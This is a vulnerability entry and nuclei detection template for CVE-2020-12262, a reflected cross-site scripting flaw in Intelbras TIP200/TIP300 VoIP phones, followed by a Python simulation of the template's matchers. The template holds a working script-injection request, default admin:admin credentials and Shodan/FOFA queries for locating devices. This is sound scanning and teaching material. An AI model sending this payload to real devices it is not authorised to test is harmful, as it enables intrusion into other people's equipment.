Intelbras TIP200 60.61.75.15, TIP200LITE 60.61.75.15, and TIP300 65.61.75.15 are vulnerable to reflected cross-site scripting (XSS) via the page parameter in /cgi-bin/cgiServer.exx, allowing attackers to execute arbitrary JavaScript in the context of the user.
PoC code [public]
id: CVE-2020-12262
info:
  name: Intelbras TIP200/TIP200LITE/TIP300 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Intelbras TIP200 60.61.75.15, TIP200LITE 60.61.75.15, and TIP300 65.61.75.15 are vulnerable to reflected cross-site scripting (XSS) via the page parameter in /cgi-bin/cgiServer.exx, allowing attackers to execute arbitrary JavaScript in the context of the user.
  remediation: |
    Update the device firmware to the latest version provided by Intelbras.
  reference:
    - https://lucxs.medium.com/cve-2020-12262-xss-voip-intelbras-d5697e31fbf6
    - https://www.youtube.com/watch?v=rihboOgiJRs
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12262
  classification:
    cve-id: CVE-2020-12262
    cwe-id: CWE-79
    epss-score: 0.02983
    epss-percentile: 0.86034
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
  metadata:
    max-request: 1
    product: tip300
    vendor: intelbras
    shodan-query: title:"Intelbras"
    fofa-query: title="Intelbras"
  tags: cve,cve2020,intelbras,tip200,tip200lite,tip300,xss,authenticated
variables:
  username: "admin"
  password: "admin"
http:
  - raw:
      - |
        GET /cgi-bin/cgiServer.exx?page=<script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}
    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "File not found"
        condition: and
      - type: word
        part: content_type
        words:
          - text/html
      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dc964f14defccef8e7e4166e2f46580e576f85f3718472762cc891637e867597022017ba73096be5aa67e1ac17198deab39c013417d180d76cb055d36ce49f1a6589:922c64590222798bb761d5b6d8e72950
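
The template's matcher logic written out in Python, as an added example that is not part of the template or of the nuclei project: it applies the three matchers to constructed responses and shows that only an unescaped reflection in a 200 text/html page matches, which is what a fixed firmware should fail. The `error_page` helper and its markup are assumptions, since the device's real response body is not shown on this page.

```python
import html

# Strings taken from the template's body matcher.
PAYLOAD = "<script>alert(document.domain)</script>"
MARKER = "File not found"


def template_matches(status, content_type, body):
    """Apply the template's three matchers joined by matchers-condition: and."""
    words_ok = PAYLOAD in body and MARKER in body  # body word matcher, condition: and
    type_ok = "text/html" in content_type          # content_type word matcher
    status_ok = status == 200                      # status matcher
    return words_ok and type_ok and status_ok


def error_page(page_value, escape):
    """Constructed stand-in for the error page that echoes the page parameter.

    Assumption: the real device markup is not on the page; only the
    "File not found" marker comes from the template.
    """
    shown = html.escape(page_value) if escape else page_value
    return f"<html><body>File not found: {shown}</body></html>"


def evaluate_cases():
    """Run the matchers over four constructed responses."""
    cases = {
        # Parameter echoed verbatim: the browser would parse it as markup.
        "raw reflection, text/html": (200, "text/html", error_page(PAYLOAD, False)),
        # Parameter HTML-escaped before echo: rendered as inert text.
        "escaped reflection": (200, "text/html; charset=utf-8", error_page(PAYLOAD, True)),
        # Verbatim echo, but not served as HTML.
        "raw reflection, text/plain": (200, "text/plain", error_page(PAYLOAD, False)),
        # Verbatim echo with a non-200 status: the status matcher rejects it.
        "raw reflection, 404": (404, "text/html", error_page(PAYLOAD, False)),
    }
    return {name: template_matches(*resp) for name, resp in cases.items()}


if __name__ == "__main__":
    for name, hit in evaluate_cases().items():
        print(f"{name}: {'match' if hit else 'no match'}")
```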